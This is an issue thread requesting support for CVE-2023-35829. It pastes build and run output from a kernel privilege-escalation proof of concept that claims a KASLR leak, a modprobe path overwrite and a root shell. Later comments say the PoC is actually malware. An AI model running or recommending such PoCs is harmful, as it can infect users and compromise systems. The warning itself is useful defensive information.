Add support for CVE-2023-35829
LordCasser opened this issue · 3 comments
LordCasser commented
chris@experience:~/CVE-2023-35829-poc# make
cc -pthread -static -o poc obj/keyring.o obj/main.o obj/modprobe.o obj/netlink.o obj/nf_tables.o obj/simple_xattr.o obj/uring.o obj/util.o
strip poc
cc -o get_root get_root_src/get_root.c
rm -fr get_root
chris@experience:~/CVE-2023-35829-poc# ./poc
[+] CVE-2023-35829 PoC
[+] Second process currently waiting
[+] Get CAP_NET_ADMIN capability
[+] Netlink socket created
[+] Netlink socket bound
[+] Table table created
[+] Set for the leak created
[+] Set for write primitive created
[+] Leak succeed
[+] kaslr base found 0xffffffff9f000000
[+] physmap base found 0xffff910a00000000
[+] modprobe path changed !
[+] Modprobe payload setup
[?] waitpid
[?] sem_post
[+++] Got root shell, should exit?
# id
uid=0(root) gid=0(root) groups=0(root)
fireneat commented
CVE-2023-35829-poc is malware; take a look at the following article. If you ran this, you have likely been infected.
LordCasser commented
> CVE-2023-35829-poc is malware; take a look at the following article. If you ran this, you have likely been infected.
Yep, I became aware of that after I reviewed some code, so I will close this issue.